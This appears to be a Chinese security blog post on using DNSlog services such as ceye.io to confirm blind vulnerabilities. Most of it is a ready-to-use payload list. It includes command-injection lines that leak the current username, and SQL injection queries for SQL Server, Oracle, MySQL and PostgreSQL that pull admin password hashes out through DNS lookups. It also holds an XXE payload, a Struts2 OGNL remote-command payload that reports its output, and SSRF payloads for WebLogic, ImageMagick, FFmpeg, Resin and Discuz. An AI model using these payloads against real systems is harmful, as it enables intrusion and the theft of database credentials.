0x00 寫這篇博客的原因是wb在線的面試中無回顯rce的問題在這里填了這個坑
0x10 下面是幾個常用的dnslog平台
1 http://ceye.io/ 2 http://www.dnslog.cn/ 3 https://github.com/BugScanTeam/DNSLog(開源可自行搭建的平台)
0x20 dnslog平台的作用
現在很多漏洞都沒有辦法去回顯,可是我們的payload已經執行,所以我們需要使用一些第三方的dnslog平台去驗證我們的漏洞的存在性。dnslog的利用方法主要涉及到以下幾種漏洞的情況
1 rce 2 ssrf 3 blind sql 4 ...
0x30 dnslog利用方式
這里通過ceyo.io為例
這里在作者windows系統下測試,發現使用ping `whoami`.1u2gcq.ceye.io這樣的命令並不好使結果產生的是找不到主機。
curl http://1u2gcq.ceye.io/whoami也並沒有使用回顯當前用戶的權限。
唯一能夠行得通的命令
ping %os%.12345.ceye.io
當%%中的為系統參數可以去執行,如果是本地參數有可能也無法去執行。
下面為一些公開的payload
1 0x00 Command Execution 2 i. *nix: 3 curl http://ip.port.b182oj.ceye.io/`whoami` 4 ping `whoami`.ip.port.b182oj.ceye.io 5 ii. windows 6 ping %USERNAME%.b182oj.ceye.io 7 0x01 SQL Injection 8 i. SQL Server 9 DECLARE @host varchar(1024); 10 SELECT @host=(SELECT TOP 1 11 master.dbo.fn_varbintohexstr(password_hash) 12 FROM sys.sql_logins WHERE name='sa') 13 +'.ip.port.b182oj.ceye.io'; 14 EXEC('master..xp_dirtree 15 "\\'+@host+'\foobar$"'); 16 ii. Oracle 17 SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io'); 18 SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL; 19 SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL; 20 SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL; 21 SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL; 22 iii. MySQL 23 SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc')); 24 iv. PostgreSQL 25 DROP TABLE IF EXISTS table_output; 26 CREATE TABLE table_output(content text); 27 CREATE OR REPLACE FUNCTION temp_function() 28 RETURNS VOID AS $ 29 DECLARE exec_cmd TEXT; 30 DECLARE query_result TEXT; 31 BEGIN 32 SELECT INTO query_result (SELECT passwd 33 FROM pg_shadow WHERE usename='postgres'); 34 exec_cmd := E'COPY table_output(content) 35 FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\''; 36 EXECUTE exec_cmd; 37 END; 38 $ LANGUAGE plpgsql SECURITY DEFINER; 39 SELECT temp_function(); 40 0x02 XML Entity Injection 41 <?xml version="1.0" encoding="UTF-8"?> 42 <!DOCTYPE root [ 43 <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test"> 44 %remote;]> 45 <root/> 46 0x03 Others 47 i. Struts2 48 xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4} 49 xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} 50 ii. FFMpeg 51 #EXTM3U 52 #EXT-X-MEDIA-SEQUENCE:0 53 #EXTINF:10.0, 54 concat:http://ip.port.b182oj.ceye.io 55 #EXT-X-ENDLIST 56 iii. Weblogic 57 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search 58 iv. ImageMagick 59 push graphic-context 60 viewbox 0 0 640 480 61 fill 'url(http://ip.port.b182oj.ceye.io)' 62 pop graphic-context 63 v. Resin 64 xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf 65 vi. Discuz 66 http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo